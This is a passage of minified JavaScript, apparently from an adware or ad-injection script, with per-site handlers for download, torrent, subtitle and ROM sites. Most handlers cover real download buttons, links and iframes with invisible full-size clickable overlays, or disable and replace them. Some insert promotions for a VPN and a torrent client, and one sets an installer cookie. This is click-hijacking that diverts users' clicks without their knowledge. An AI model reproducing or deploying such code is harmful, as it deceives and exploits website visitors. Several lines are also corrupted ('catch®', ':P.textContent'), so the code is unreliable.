e)e[h]&&e[h].style&&\"fixed\"==e[h].style.position&&\"solid\"==e[h].style.borderBottomStyle&&(e[h].style.display=\"none\")}}};this[\"coolrom.com\"]=new function(){this.init=function(){for(var e=document.getElementsByTagName(\"img\"),h=0;h<e.length;h++)-1<e[h].src.indexOf(\"/images/download_large.png\")&&e[h].parentNode.setAttribute(\"href\",\"javascript:void(0);\");e=\nnew Date;e.setTime(e.getTime()+2592E6);e=\"; expires=\"+e.toGMTString();document.cookie=\"installer=14604\"+e+\"; path=/;domain=.coolrom.com\"}};this[\"ebookbrowsee.net\"]=new function(){this.init=function(){}};this[\"cloud-vibe.com\"]=new function(){this.init=function(){-1<document.location.host.indexOf(\"loud-vibe.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(e){e.returnValue=!1;e.preventDefault&&e.preventDefault()},\n!1),a.addEventListener(\"mousedown\",function(e){e.returnValue=!1;e.preventDefault&&e.preventDefault()},!1))}};this[\"mp3seal.com\"]=new function(){this.init=function(){-1<document.location.host.indexOf(\"p3seal.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(e){e.returnValue=!1;e.preventDefault&&e.preventDefault()},!1),a.addEventListener(\"mousedown\",function(e){e.returnValue=!1;e.preventDefault&&e.preventDefault()},\n!1))}};this[\"mp3vampire.com\"]=new function(){this.init=function(){-1<document.location.host.indexOf(\"p3vampire.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(e){e.returnValue=!1;e.preventDefault&&e.preventDefault()},!1),a.addEventListener(\"mousedown\",function(e){e.returnValue=!1;e.preventDefault&&e.preventDefault()},!1))}};this[\"minecraftdl.com\"]=new function(){this.init=function(){-1<document.location.href.indexOf(\"necraftdl.com/download.ph\")&&\n(a=document.getElementById(\"downloadpage\"),b=a.getElementsByTagName(\"a\")[0],d=document.createElement(\"div\"),d.style.position=\"absolute\",d.style.width=\"100%\",d.style.height=\"34px\",d.style.left=\"0\",d.style.cursor=\"pointer\",d.style.zIndex=9999,b.parentNode.insertBefore(d,b.previousSibling));if(-1<document.location.href.indexOf(\"necraftdl.com\"))for(i=0;i<document.links.length;i++){var e=document.links[i];\".exe\"==e.href.substr(-4)&&(e=e.parentNode,e.style.position=\"relative\",d=document.createElement(\"div\"),\nd.style.position=\"absolute\",d.style.top=0,d.style.left=0,d.style.width=\"100%\",d.style.height=\"100%\",d.style.cursor=\"pointer\",d.style.zIndex=9999,e.appendChild(d))}}};this[\"leunlckr.co\"]=new function(){this.init=function(){if(-1<document.location.host.indexOf(\"leunlckr.co\")){var e=document.getElementsByTagName(\"button\")[0],h=document.createElement(\"button\");h.className=e.className;h.innerHTML=e.innerHTML;e.parentNode.insertBefore(h,e);e.parentNode.removeChild(e)}}};this[\"go.theadsnet.com\"]=new function(){this.init=\nfunction(){-1<document.referrer.indexOf(\"go.theadsnet.com\")&&document.write(\"\");(function(){var e=0;try{if(-1<window.location.href.indexOf(\"ack-free.co\"))var h=setInterval(function(){try{var k=document.getElementById(\"ucd-countdown-1\"),m=[];m.push(1*k.children[2].children[1].children[1].innerText);m.push(1*k.children[2].children[2].children[1].innerText);m.push(1*k.children[3].children[1].children[1].innerText);m.push(1*k.children[3].children[2].children[1].innerText);for(var n=k=0;n<m.length;n++)k+=\nm[n];if(!(0<k)){clearInterval(h);var q=document.createElement(\"div\");q.style.position=\"absolute\";q.style.top=0;q.style.left=0;q.style.width=\"100%\";q.style.height=\"100%\";q.style.zIndex=\"9999\";q.style.cursor=\"pointer\";var t=document.getElementById(\"ucd-countdown-1-content\").children[1];t.style.position=\"relative\";t.appendChild(q)}}catch®{try{var u=0;jQuery.each(jQuery(\".ucd-figure.ucd-countdown-digit-bottom\"),function(){u+=1*jQuery(this).text()});if(0===u){clearInterval(h);var w=jQuery(\"#ucd-countdown-1-content iframe\"),\nx=w.parent();w.remove();x.html(\"<img title='Get Download' alt='latbut' src='http://i.imgur.com/At0oA5A.png' height='61' width='373'>\")}}catch(v){\"undefined\"!==typeof e&&30<++e&&clearInterval(h)}}},750)}catch(k){}})()}};this[\"ziddu.com\"]=new function(){this.init=function(){var e=0,h=setInterval(function(){e++;if(-1<window.location.host.indexOf(\"ownloads.ziddu.co\")){for(var k=0;k<document.links.length;k++)try{var l=document.links[k].href.toLowerCase();if(-1==l.indexOf(\"ww.ziddu.co\")&&-1==l.indexOf(\"#\")&&\n-1==l.indexOf(\"tunes.apple.co\")&&-1==l.indexOf(\"lay.google.co\")&&-1==l.indexOf(\"/gallery/\")){try{for(var m=document.links[k],n=0;15>=n;n++)m=m.parentNode;if(-1<m.className.indexOf(\"footerbg\"))continue}catch(q){}var t=document.links[k].parentNode;if(!(-1<t.className.indexOf(\"addthis_toolbox\"))){t.style.position=\"relative\";var r=document.createElement(\"div\");r.style.position=\"absolute\";r.style.left=0;r.style.top=0;r.style.width=\"100%\";r.style.height=\"100%\";r.style.zIndex=\"9999\";r.style.cursor=\"pointer\";\nt.appendChild®}}}catch(u){}l=document.getElementsByTagName(\"iframe\");for(k=0;k<l.length;k++)try{-1==l[k].src.indexOf(\"acebook.co\")&&-1==l[k].src.indexOf(\"cp.crwdcntrl.ne\")&&(t=l[k].parentNode,t.style.position=\"relative\",r=document.createElement(\"div\"),r.style.position=\"absolute\",r.style.left=0,r.style.top=0,r.style.width=\"100%\",r.style.height=\"100%\",r.style.zIndex=\"9999\",r.style.cursor=\"pointer\",r.id=k,t.appendChild®)}catch(w){}}20<e&&clearInterval(h)},500)}};this[\"pensubtitles.us\"]=new function(){this.init=\nfunction(){if(-1<window.location.href.indexOf(\"/opensubtitles-playe\")){var e=document.getElementById(\"divPlayerDesc\");if(null!=e){e.style.position=\"relative\";var h=document.createElement(\"div\");h.style.position=\"absolute\";h.style.width=\"100%\";h.style.height=\"100%\";h.style.cursor=\"pointer\";h.style.top=\"0\";h.style.zIndex=\"2000\";e.appendChild(h);if(e=e.children[0]){var k=e.children[0];k&&(k.setAttribute(\"href\",\"javascript:void(0);\"),k.setAttribute(\"target\",\"_self\"))}}e=document.getElementById(\"divPlayerHead\");\nif(null!=e)for(var l=0;l<e.children.length;l++)if(\"span\"==e.children[l].tagName.toLowerCase()){var m=e.children[l],h=document.createElement(\"div\");h.style.position=\"absolute\";h.style.width=\"106%\";h.style.height=\"70px\";h.style.cursor=\"pointer\";h.style.top=\"-50px\";h.style.left=\"-6%\";h.style.zIndex=\"2000\";if(k=m.children[0])k.setAttribute(\"href\",\"javascript:void(0);\"),k.setAttribute(\"target\",\"_self\");m.style.position=\"relative\";m.appendChild(h)}}}};this[\"opensubtitles.org\"]=new function(){this.init=\nfunction(){new function(){var e=document.getElementById(\"scrubbuad\");e&&(e.style.zIndex=\"15\",f=document.createElement(\"div\"),f.style.zIndex=\"15000\",f.style.right=\"9px\",f.style.bottom=\"0\",f.style.position=\"fixed\",f.style.padding=\"0\",f.style.margin=\"0 0 30px 0\",f.style.width=\"220px\",f.style.height=\"72px\",f.style.overflow=\"visible\",f.style.cursor=\"pointer\",document.getElementsByTagName(\"body\")[0].firstChild.appendChild(f));(e=n.utils.query_selector_all('a[href=\"javascript:dowSub(0);\"]')[0])&&e.setAttribute(\"href\",\n\"javascript:void(0)\");for(var h=n.utils.query_selector_all('div[style=\"clear: both;\"] fieldset table[style=\"width:100%;\"] td'),e=0;e<h.length;e++){var k=n.utils.duplicateElement(h[e]),l=h[e].parentNode;l.insertBefore(k,h[e]);l.removeChild(h[e])}h=n.utils.query_selector_all('div[style=\"margin-left: 110px;\"] fieldset div[style=\"text-align: left\"] a');for(e=0;e<h.length;e++)k=n.utils.duplicateElement(h[e]),l=h[e].parentNode,l.insertBefore(k,h[e]),l.removeChild(h[e])}}};this[\"romptfile.co\"]=new function(){this.init=\nfunction(){if(-1<location.host.toLowerCase().indexOf(\"romptfile.co\")){for(var e={},h=document.getElementsByTagName(\"iframe\"),k=0;k<h.length;k++)\"300\"==h[k].getAttribute(\"width\")&&\"250\"==h[k].getAttribute(\"height\")&&(e=h[k].parentNode);e.style.position=\"relative\";d=document.createElement(\"div\");d.style.position=\"absolute\";d.style.width=\"100%\";d.style.height=\"255px\";d.style.cursor=\"pointer\";d.style.top=\"0\";d.style.zIndex=\"2000\";e.appendChild(d)}}};this[\"pensoftwareupdater.co\"]=new function(){this.init=\nfunction(){new function(){if(-1<window.location.host.toLowerCase().indexOf(\"pensoftwareupdater.co\"))if(\"undefined\"!==typeof $)window.__qqcount=0,window.__qqint=setInterval(function(){var e=$(\".download\").parent();e.css(\"position\",\"relative\");var h=document.createElement(\"div\");h.style.position=\"absolute\";h.style.zIndex=\"2000\";h.style.height=\"100%\";h.style.width=\"122px\";h.style.right=\"0\";h.style.top=\"0\";h.style.cursor=\"pointer\";e.append(h);e=$(\"#addBoxX\").parent();e.css(\"position\",\"relative\");h=document.createElement(\"div\");\nh.style.position=\"absolute\";h.style.zIndex=\"2000\";h.style.height=\"45px\";h.style.width=\"101px\";h.style.right=\"22px\";h.style.bottom=\"16px\";h.style.cursor=\"pointer\";e.append(h);window.__qqcount++;10<window.__qqcount&&clearInterval(window.__qqint)},250);else for(var e=document.links,h={},k={},l=0;l<e.length;l++)h=e[l].getAttribute(\"href\"),null!=h&&-1<h.toLowerCase().indexOf(\"pensoftwareupdater.com/idownloader.ph\")&&(h=e[l].getAttribute(\"id\"),null!=h&&\"addBoxX\"==h?(k=e[l].parentNode,k.style.position=\"relative\",\nh=document.createElement(\"div\"),h.style.position=\"absolute\",h.style.zIndex=\"2000\",h.style.height=\"45px\",h.style.width=\"101px\",h.style.right=\"22px\",h.style.bottom=\"16px\"):(k=e[l].parentNode,k.style.position=\"relative\",h=document.createElement(\"div\"),h.style.position=\"absolute\",h.style.zIndex=\"2000\",h.style.height=\"100%\",h.style.width=\"122px\",h.style.right=\"0\",h.style.top=\"0\"),h.style.cursor=\"pointer\",k.appendChild(h))}}};this[\"veehd.com\"]=new function(){this.init=function(){new function(){if(-1<window.location.href.indexOf(\"veehd.com/video/\")){var e=\ndocument.getElementsByTagName(\"iframe\")[0],h={};null!=e&&(e=e.parentNode,h=document.createElement(\"div\"),h.style.top=\"0\",h.style.width=\"100%\",h.style.height=\"100%\",h.style.cursor=\"pointer\",h.style.zIndex=\"2000\",h.style.position=\"absolute\",e.style.position=\"relative\",e.appendChild(h));e=document.getElementById(\"preview\");null!=e&&(h=document.createElement(\"div\"),h.style.top=\"0\",h.style.width=\"100%\",h.style.height=\"100%\",h.style.cursor=\"pointer\",h.style.zIndex=\"2000\",h.style.position=\"absolute\",e.style.position=\n\"relative\",e.appendChild(h))}else for(var h=document.getElementsByTagName(\"a\"),k=0;k<h.length;k++)if(\"getDownload();\"==h[k].getAttribute(\"onclick\")){e=document.createElement(\"a\");e.style.cursor=\"pointer\";var l=document.createElement(\"img\");l.setAttribute(\"src\",h[k].children[0].getAttribute(\"src\"));l.setAttribute(\"border\",\"0\");e.appendChild(l);l=h[k].parentNode;l.removeChild(h[k]);h=l.getElementsByTagName(\"div\")[0];l.insertBefore(e,h);break}}}};this[\"ullypcgames.ne\"]=new function(){this.init=function(){if(-1<\nwindow.location.host.toLowerCase().indexOf(\"ullypcgames.ne\"))for(var e=document.getElementsByTagName(\"center\"),h=0;h<e.length;h++){var k=e[h].firstChild;\"undefined\"!==typeof k.tagName&&\"a\"==k.tagName.toLowerCase()&&(e[h].style.position=\"relative\",k=document.createElement(\"div\"),k.style.position=\"absolute\",k.style.top=\"0\",k.style.left=\"0\",k.style.width=\"100%\",k.style.height=\"100%\",k.style.zIndex=\"2000\",k.style.cursor=\"pointer\",e[h].appendChild(k))}}};this[\"llplayer.com.b\"]=new function(){this.init=\nfunction(){if(-1<window.location.host.toLowerCase().indexOf(\"llplayer.com.b\"))for(var e=document.getElementsByTagName(\"img\"),h=0;h<e.length;h++)if(e[h].getAttribute(\"src\")&&-1<e[h].getAttribute(\"src\").indexOf(\"fullpage_eng.png\")){var k=document.createElement(\"div\");k.style.width=\"100%\";k.style.height=\"100%\";k.style.position=\"absolute\";k.style.zIndex=\"9999\";k.style.top=\"0\";k.style.cursor=\"pointer\";var l=e[h].parentNode.parentNode;l.style.position=\"relative\";l.appendChild(k)}}};this[\"ubtitulosespanol.or\"]=\nnew function(){this.init=function(){if(0<location.host.toLowerCase().indexOf(\"ubtitulosespanol.or\")){var e=document.links;for(i=0;i<e.length;i++)if(\"Descargue su subt\\u00edtulo aqu\\u00ed\"===(e[i].innerText?e[i].innerText:e[i].textContent)){var h=document.createElement(\"div\");h.style.position=\"absolute\";h.style.width=\"100%\";h.style.height=\"100%\";h.style.cursor=\"pointer\";h.style.top=\"0\";h.style.left=\"0\";h.style.zIndex=\"2000\";var k=e[i].parentNode;k.appendChild(h);k.style.position=\"relative\"}}}};this[\"ubtitles4free.ne\"]=\nnew function(){this.init=function(){if(0<location.host.toLowerCase().indexOf(\"ubtitles4free.ne\")){var e=document.links;for(i=0;i<e.length;i++)if(\"Download Subtitle\"===(e[i].innerText?e[i].innerText:e[i].textContent)||\"Download Player\"===(e[i].innerText?e[i].innerText:e[i].textContent)){var h=document.createElement(\"div\");h.style.position=\"absolute\";h.style.width=\"100%\";h.style.height=\"100%\";h.style.cursor=\"pointer\";h.style.top=\"0\";h.style.left=\"0\";h.style.zIndex=\"2000\";var k=e[i].parentNode;k.appendChild(h);\nk.style.position=\"relative\"}}}};this[\"legendasbrasil.org\"]=new function(){this.init=function(){if(0<location.host.toLowerCase().indexOf(\"legendasbrasil.org\")){var e=document.links;for(i=0;i<e.length;i++)if(\"Baixar Legenda\"===(e[i].innerText?e[i].innerText:e[i].textContent)||\"Baixar Player\"===(e[i].innerText?e[i].innerText:e[i].textContent)||\"Baixe sua legenda aqui\"===(e[i].innerText?e[i].innerText:e[i].textContent)){var h=document.createElement(\"div\");h.style.position=\"absolute\";h.style.width=\"100%\";\nh.style.height=\"100%\";h.style.cursor=\"pointer\";h.style.top=\"0\";h.style.left=\"0\";h.style.zIndex=\"2000\";var k=e[i].parentNode;k.appendChild(h);k.style.position=\"relative\"}}}};this[\"reeroms.co\"]=new function(){this.init=function(){window.location.host.toLowerCase().indexOf(\"reeroms.co\")&&(window.__sdahfjkahfals3243Count=0,window.__sdahfjkahfals3243Int=setInterval(function(){for(var e=document.getElementsByTagName(\"a\"),h=0;h<e.length;h++){var k=\"undefined\"===typeof e[h].innerText?e[h].textContent:e[h].innerText,\nk=k.trim();if(\"Download\"===k||0==k.indexOf(\"Direct\")){var l=document.createElement(\"div\");l.style.width=\"100%\";l.style.height=\"100%\";l.style.position=\"absolute\";l.style.zIndex=\"9999\";l.style.top=\"0\";l.style.cursor=\"pointer\";var m=e[h].parentNode;m.style.position=\"relative\";m.appendChild(l);0==k.indexOf(\"Direct\")&&clearInterval(window.__sdahfjkahfals3243Int)}}40<window.__sdahfjkahfals3243Count++&&clearInterval(window.__sdahfjkahfals3243Int)},500))}};this[\"eneral-ebooks.co\"]=new function(){this.init=\nfunction(){if(-1<window.location.host.toLowerCase().indexOf(\"eneral-ebooks.co\"))for(var e=document.getElementsByTagName(\"iframe\"),h=0;h<e.length;h++){var k=e[h].parentNode;if(null!=k){var l=k.getAttribute(\"class\");null!=l&&-1<l.indexOf(\"banner-body\")&&(l=document.createElement(\"div\"),l.style.width=\"100%\",l.style.height=\"100%\",l.style.position=\"absolute\",l.style.zIndex=\"9999\",l.style.top=\"0\",l.style.cursor=\"pointer\",k.style.position=\"relative\",k.appendChild(l))}}}};this[\"stream2watch.me\"]=new function(){this.init=\nfunction(){-1<location.host.toLowerCase().indexOf(\"stream2watch.me\")&&(window.__z_tream2count=0,window.__z_tream2int=setInterval(function(){20<window.__z_tream2count++&&clearInterval(window.__z_tream2int);var e=document.getElementById(\"rh_toolbar_STRTOPB\"),h=document.getElementById(\"rhfrm_STRTOPB\");if(null!=e&&null!=h){var k=document.createElement(\"div\");k.style.width=\"100%\";k.style.height=\"100%\";k.style.cursor=\"pointer\";k.style.zIndex=\"2000\";k.style.position=\"absolute\";e.appendChild(k);h.style.position=\n\"absolute\";h.style.zIndex=\"-1\";clearInterval(window.__z_tream2int)}},500))}};this[\"old_ki_ckass.to\"]=new function(){var e=this;e.init=function(){location.protocol+\"//\"+window.location.host+\"/\"!=window.location.href&&(e.counter=0,e.kickass=function(){20<++e.counter&&clearInterval(e.interval);var h=n.utils.query_selector_all(\".advertDownload\");if(0<h.length){var k=document.createElement(\"div\");k.style.width=\"100%\";k.style.height=\"100%\";k.style.cursor=\"pointer\";k.style.zIndex=\"2000\";k.style.position=\n\"absolute\";k.style.top=\"0\";k.style.left=\"0\";h[0].appendChild(k);h[0].style.position=\"relative\";h[0].style.overflow=\"hidden\";h=h[0].getElementsByTagName(\"a\");for(k=0;k<h.length;k++)h[k].setAttribute(\"href\",\"javascript:void(0);\"),h[k].setAttribute(\"onclick\",\"void(0);\");clearInterval(e.interval)}},e.interval=setInterval(e.kickass,500))}};this[\"kickass.to\"]=new function(){var e=this;e.init=function(){if(location.protocol+\"//\"+window.location.host+\"/\"!=window.location.href){e.counter=0;e.___ZskskskCount=\n0;e.___ZskskskthisZ=function(){try{20<++e.___ZskskskCount&&clearInterval(e.___ZskskskInter);for(var h=document.getElementsByTagName(\"div\"),k=0;k<h.length;k++){var l=h[k].getAttribute(\"align\");if(l&&\"center\"==l){var m=h[k].children[0];if(m&&m.getAttribute&&\"siteButton giantButton\"==m.getAttribute(\"class\")){var n=document.createElement(\"a\");n.style.fontSize=\"20px\";n.style.textAlign=\"center\";n.style.marginBottom=\"5px\";n.className=\"siteButton giantButton\";var p=document.createElement(\"span\");p.innerText?\np.innerText=\"Protect yourself now with hide.me VPN\" :P.textContent=\"Protect yourself now with hide.me VPN\";n.appendChild(p);h[k].removeChild(m);h[k].appendChild(n);clearInterval(e.___ZskskskInter)}}}}catch(v){clearInterval(e.___ZskskskInter)}};e.___ZskskskInter=setInterval(e.___ZskskskthisZ,500);for(var h=n.utils.query_selector_all(\".partner1Button.idownload.icon16\"),k=0;k<h.length;k++){var l=h[k].nextSibling,m=document.createElement(\"a\");m.className=\"partner1Button idownload icon16\";m.setAttribute(\"href\",\n\"#\");var p=document.createElement(\"span\");m.appendChild(p);p=h[k].parentNode;l?p.insertBefore(m,l) :P.appendChild(m);p.removeChild(h[k])}e.counter=0;e.kickassx=function(){20<++e.counter&&clearInterval(e.interval);0<n.utils.query_selector_all(\"div#vuzeDownload a\").length&&(document.getElementById(\"vuzeDownload\").parentNode.innerHTML='<div id=\"vuzeDownload\">To download this torrent, you need a BitTorrent client: <a href=\"#\">Bitlord</a></div>',clearInterval(e.interval))};e.interval=setInterval(e.kickassx,\n500);e.counterClick=0;e.kickassClick=function(){20<++e.counterClick&&clearInterval(e.interval2);var h=n.utils.query_selector_all(\".block.botmarg5px\")[0];h&&\"Download faster CLICK HERE\"==(h.innerText?h.innerText:h.textContent)&&(h.innerHTML='<div class=\"block botmarg5px\">Download faster <a href=\"#\">CLICK HERE</a></div>',clearInterval(e.interval2))};e.interval2=setInterval(e.kickassClick,500)}}};this[\"kickass.so\"]=new function(){var e=this;e.init=function(){if(location.protocol+\"//\"+window.location.host+\n\"/\"!=window.location.href){e.counter=0;e.___ZskskskCount=0;e.___ZskskskthisZ=function(){try{20<++e.___ZskskskCount&&clearInterval(e.___ZskskskInter);for(var h=document.getElementsByTagName(\"div\"),k=0;k<h.length;k++){var l=h[k].getAttribute(\"align\");if(l&&\"center\"==l){var m=h[k].children[0];if(m&&m.getAttribute&&\"siteButton giantButton\"==m.getAttribute(\"class\")){var n=document.createElement(\"a\");n.style.fontSize=\"20px\";n.style.textAlign=\"center\";n.style.marginBottom=\"5px\";n.className=\"siteButton giantButton\";\nvar p=document.createElement(\"span\");p.innerText?p.innerText=\"Protect yourself now with hide.me VPN\" :P.textContent=\"Protect yourself now with hide.me VPN\";n.appendChild(p);h[k].removeChild(m);h[k].appendChild(n);clearInterval(e.___ZskskskInter)}}}}catch(v){clearInterval(e.___ZskskskInter)}};e.___ZskskskInter=setInterval(e.___ZskskskthisZ,500);for(var h=n.utils.query_selector_all(\".partner1Button.idownload.icon16\"),k=0;k<h.length;k++){var l=h[k].nextSibling,m=document.createElement(\"a\");m.className=\n\"partner1Button idownload icon16\";m.setAttribute(\"href\",\"#\");var p=document.createElement(\"span\");m.appendChild(p);p=h[k].parentNode;l?p.insertBefore(m,l) :P.appendChild(m);p.removeChild(h[k])}e.counter=0;e.kickassx=function(){20<++e.counter&&clearInterval(e.interval1);0<n.utils.query_selector_all(\"div#vuzeDownload a\").length&&(document.getElementById(\"vuzeDownload\").parentNode.innerHTML='<div id=\"vuzeDownload\">To download this torrent, you need a BitTorrent client: <a href=\"#\">Bitlord</a></div>',\nclearInterval(e.interval1))};e.interval1=setInterval(e.kickassx,500);e.counterClick=0;e.kickassClick=function(){20<++e.counterClick&&clearInterval(e.interval2);var h=n.utils.query_selector_all(\".block.botmarg5px\")[0];h&&\"Download faster CLICK HERE\"==(h.innerText?h.innerText:h.textContent)&&(h.innerHTML='<div class=\"block botmarg5px\">Download faster <a href=\"#\">CLICK HERE</a></div>',clearInterval(e.interval2))};e.interval2=setInterval(e.kickassClick,500)}}};this[\"uploadrocket.net\"]=new function(){this.init=\nfunction(){var e=n.utils.query_selector_all(\".dlbutton_green\");if(e&&0<e.length){var e=e[0],h=document.createElement(\"a\");h.className=\"dlbutton_green\";h.setAttribute(\"href\",\"javascript:void(0)\");var k=document.createElement(\"span\");k.innerText?k.innerText=\"Download Now\":k.textContent=\"Download Now\";h.appendChild(k);k=e.parentNode;k.removeChild(e);k.appendChild(h)}(e=n.utils.query_selector_all(\".middle\"))&&0<e.length&&(e=e[0].children[4])&&e.setAttribute(\"href\",\"javascript:void(0);\");if((e=n.utils.query_selector_all(\"#ID_freeorpremium table tr td a\"))&&\n0<e.length)for(h=0;h<e.length;h++)e[h].setAttribute(\"href\",\"javascript:void(0);\");(e=n.utils.query_selector_all(\"#ID_freeorpremium input[type='submit']\"))&&0<e.length&&e[0].setAttribute(\"type\",\"button\");(e=n.utils.query_selector_all(\"#ID_freeorpremium\"))&&0<e.length&&(e=e[0])&&(e.style.position=\"relative\",h=document.createElement(\"div\"),h.style.position=\"absolute\",h.style.width=\"100%\",h.style.height=\"95px\",h.style.zIndex=\"2000\",h.style.top=\"0\",h.style.cursor=\"pointer\",e.appendChild(h))}};this[\"programas-gratis.net\"]=\nnew function(){this.init=function(){for(var e=n.utils.query_selector_all(\".list.new .download_button\"),h=0;h<e.length;h++){var k=e[h].parentNode;k.style.position=\"relative\";var l=document.createElement(\"span\");l.style.position=\"absolute\";l.style.width=\"124px\";l.style.height=\"42px\";l.style.zIndex=\"2000\";l.style.top=\"44px\";l.style.right=\"9px\";l.style.cursor=\"pointer\";k.appendChild(l);e[h].setAttribute(\"href\",\"javascript:void(0)\")}}};this[\"programasgratis.es\"]=new function(){this.init=function(){for(var e=\nn.utils.query_selector_all(\"#bloque_top_portada .programa_top_portada a\"),h=0;h<e.length;h++)if(e[h].setAttribute(\"href\",\"javascript:void(0)\"),\"rojo\"!=e[h].className){var k=e[h].parentNode;k.style.position=\"relative\";var l=document.createElement(\"span\");l.style.position=\"absolute\";l.style.width=\"100%\";l.style.height=\"152px\";l.style.zIndex=\"2000\";l.style.top=\"0\";l.style.right=\"0\";l.style.cursor=\"pointer\";k.appendChild(l)}e=n.utils.query_selector_all(\".bloque_novedades .link_categoria_descargar\");for(h=\n0;h<e.length;h++)k=e[h].parentNode,k.style.position=\"relative\",l=document.createElement(\"span\"),l.style.position=\"absolute\",l.style.width=\"124px\",l.style.height=\"42px\",l.style.zIndex=\"2000\",l.style.top=\"-5px\",l.style.right=\"0\",l.style.cursor=\"pointer\",k.appendChild(l),e[h].setAttribute(\"href\",\"javascript:void(0)\")}};this[\"programasejogos.com\"]=new function(){this.init=function(){for(var e=n.utils.query_selector_all(\".enlace_pestania_descargar\"),h=0;h<e.length;h++){var k=e[h].parentNode;k.style.position=\n\"relative\";var l=document.createElement(\"span\");l.style.position=\"absolute\";l.style.width=\"200px\";l.style.height=\"90px\";l.style.zIndex=\"2000\";l.style.top=\"65px\";l.style.right=\"0\";l.style.cursor=\"pointer\";k.appendChild(l);e[h].setAttribute(\"href\",\"javascript:void(0)\")}e=[];e=e.concat(n.utils.query_selector_all(\".linea_fondo1 .enlace_pestania_descargar_pequeno\"));e=e.concat(n.utils.query_selector_all(\".linea_fondo1 .boton_clase_listado\"));e=e.concat(n.utils.query_selector_all(\".linea_fondo .enlace_pestania_descargar_pequeno\"));\nfor(h=0;h<e.length;h++)for(var m=0;m<e[h].length;m++)k=e[h][m].parentNode,k.style.position=\"relative\",l=document.createElement(\"span\"),l.style.position=\"absolute\",l.style.width=\"115px\",l.style.height=\"28px\",l.style.zIndex=\"2000\",l.style.top=\"0\",l.style.right=\"0\",l.style.cursor=\"pointer\",k.appendChild(l),e[h][m].setAttribute(\"href\",\"javascript:void(0)\");e=n.utils.query_selector_all(\".pyj_registro_inferior .enlace_pestania_descargar_pequeno\");for(h=0;h<e.length;h++)k=e[h].parentNode,k.style.position=\n\"relative\",l=document.createElement(\"span\"),l.style.position=\"absolute\",l.style.width=\"105px\",l.style.height=\"29px\",l.style.zIndex=\"2000\",l.style.top=\"3px\",l.style.right=\"-4px\",l.style.cursor=\"pointer\",k.appendChild(l),e[h].setAttribute(\"href\",\"javascript:void(0)\")}};this[\"uploading.com\"]=new function(){this.init=function(){if(window.self===window.top&&location.host.toLowerCase().indexOf(\"ploading.com/files/\"))for(var e=typeof document.querySelectorAll?document.getElementsByTagName(\"div\"):document.querySelectorAll(\"div.method_title\"),\nh=0;h<e.length;h++){var k=e[h].className;k&&\"undefined\"!==typeof k&&-1<k.indexOf(\"method_title\")&&(k=e[h].getAttribute(\"onclick\"))&&\"undefined\"!==typeof k&&-1<k.indexOf(\"location.href\")&&(e[h].setAttribute(\"onclick\",\"void(0);\"),k=e[h].cloneNode(!0),e[h].parentNode.replaceChild(k,e[h]),k.setAttribute(\"onclick\",\"void(0);\"))}setTimeout(function(){var e=n.utils.query_selector_all(\".method_title\")[0];if(e){var h=e.parentNode,k=document.createElement(\"div\");k.className=\"method_title\";var q=document.createElement(\"i\"),\nt=document.createElement(\"span\");t.setAttribute(\"id\",\"timer_count\");t.innerText=\"Download for free\";t.textContent=\"Download for free\";k.appendChild(q);k.appendChild(t);h.insertBefore(k,e);h.removeChild(e)}},1E3)}};this[\"flexydrive.com\"]=new function(){this.init=function(){for(var e=0;e<document.links.length;e++){var h=document.links[e],k=h.getAttribute(\"href\");if(k&&-1<k.indexOf(\"file21desktop.com\")){var k=n.utils.duplicateElement(h),l=h.parentNode;l.insertBefore(k,h);l.removeChild(h)}}}};this[\"media1fire.com\"]=\nnew function(){this.init=function(){var e=n.utils.query_selector_all('input[name=\"adcopy_response\"]');0<e.length&&(e[0].disabled=!0);for(e=0;e<document.links.length;e++){var h=document.links[e],k=h.getAttribute(\"href\");if(k&&-1<k.indexOf(\"file21desktop.com\")){var k=n.utils.duplicateElement(h),l=h.parentNode;l.insertBefore(k,h);l.removeChild(h)}}}};this[\"softwareandgames.com\"]=new function(){this.init=function(){for(var e=0;e<document.links.length;e++){var h=document.links[e],k=h.getAttribute(\"href\");\nif(k&&-1<k.indexOf(\"softwareandgames.com/download\")){var k=n.utils.duplicateElement(h),l=h.parentNode;l.insertBefore(k,h);l.removeChild(h)}}}};this[\"programmesetjeux.com\"]=new function(){this.init=function(){for(var e=0;e<document.links.length;e++){var h=document.links[e],k=h.getAttribute(\"href\");if(k&&-1<k.indexOf(\"programmesetjeux.com/telecharger\")){var k=n.utils.duplicateElement(h),l=h.parentNode;l.insertBefore(k,h);l.removeChild(h)}}}};this[\"baixarjogos.com\"]=new function(){this.init=function(){for(var e=\n0;e<document.links.length;e++){var h=document.links[e],k=h.getAttribute(\"href\");if(k&&-1<k.indexOf(\"baixarjogos.com/baixar\")){var k=n.utils.duplicateElement(h),l=h.parentNode;l.insertBefore(k,h);l.removeChild(h)}}}};this[\"descargarjuegos.com\"]=new function(){this.init=function(){for(var e=0;e<document.links.length;e++){var h=document.links[e],k=h.getAttribute(\"href\");if(k&&-1<k.indexOf(\"descargarjuegos.com/descargar\")){var k=n.utils.duplicateElement(h),l=h.parentNode;l.insertBefore(k,h);l.removeChild(h)}}}};\nthis[\"hotfiles.ro\"]=new function(){this.init=function(){for(var e=0;e<document.links.length;e++){var h=document.links[e],k=h.getAttribute(\"href\");if(k&&-1<k.indexOf(\"hotfil.es/goref.php\")){var k=n.utils.duplicateElement(h),l=h.parentNode;l.insertBefore(k,h);l.removeChild(h)}}}};this[\"vitanclub.net\"]=new function(){this.init=function(){var e=n.utils.query_selector_all(\".pdld\")[0],h=n.utils.duplicateElement(e),k=e.parentNode;k.insertBefore(h,e);k.removeChild(e);e=document.getElementById(\"container_bottom\");\nn.utils.coverElement(e)}};this[\"mirrorcreator.com\"]=new function(){this.init=function(){for(var e=0;e<document.links.length;e++){var h=document.links[e],k=h.getAttribute(\"href\");if(k&&(-1<k.indexOf(\"getsecuredfiles.com/mirrorc\")||-1<k.indexOf(\"westzip.in/\"))){var k=n.utils.duplicateElement(h),l=h.parentNode;l.insertBefore(k,h);l.removeChild(h)}}}};this[\"mestorrents.com\"]=new function(){this.init=function(){for(var e=0;e<document.links.length;e++){var 